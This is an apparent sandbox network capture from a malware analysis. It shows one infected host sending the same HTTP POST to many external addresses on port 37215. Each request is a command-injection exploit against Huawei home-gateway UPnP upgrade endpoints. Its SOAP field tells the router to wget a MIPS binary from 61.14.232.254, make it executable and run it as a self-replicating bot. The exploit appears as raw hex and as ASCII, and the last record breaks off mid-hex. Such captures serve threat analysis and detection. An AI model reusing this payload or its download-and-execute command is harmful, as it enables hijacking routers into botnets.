                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2147192.168.2.134821241.23.166.25337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.725441933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2148192.168.2.133701241.199.207.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.725467920 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2149192.168.2.1337906157.217.54.12537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.725811958 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2150192.168.2.135329041.253.223.2337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.725909948 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2151192.168.2.133322041.50.213.11537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.725999117 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2152192.168.2.135579617.142.253.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.726064920 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2153192.168.2.135880041.243.21.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.726089001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2154192.168.2.1337754125.30.43.17637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.726102114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2155192.168.2.136034441.213.83.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.726193905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2156192.168.2.134589041.54.181.16137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.726208925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 